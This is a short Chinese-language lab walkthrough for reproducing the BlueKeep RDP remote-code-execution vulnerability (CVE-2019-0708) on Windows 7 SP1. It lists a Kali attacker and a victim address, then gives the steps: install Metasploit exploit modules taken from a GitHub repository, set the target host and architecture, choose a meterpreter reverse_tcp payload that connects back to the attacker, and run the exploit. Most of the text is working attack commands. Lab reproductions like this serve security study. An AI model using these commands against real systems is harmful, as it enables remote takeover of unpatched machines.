漏洞環境
- 192.168.91.136 windows7 6.1.7601
- 192.168.91.151 kali
Windows7 SP1下載鏈接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
復現過程
1、首先升級MSF
apt-get update
apt-get install metasploit-framework
2、導入腳本
然後下載RCE腳本,直接將下載下載的腳本放到對應的目錄下
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
下載地址:
https://github.com/NAXG/cve_2019_0708_bluekeep_rce
3、重新加載腳本
msfconsole
reload_all
4、攻擊
使用set RHOSTS 受害機IP設置受害機IP
使用set RPORT 受害機PORT設置受害機RDP端口號
使用set target ID數字(可選爲0-4)設置受害機機器架構
lhost一般不用設置,payload一定要設置
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set lhost 192.168.91.151
set rhost 192.168.91.136
set payload windows/x64/meterpreter/reverse_tcp
set target 1
run
目前這個exp僅適用於 windows7 6.1.7601 windows 2008r2
END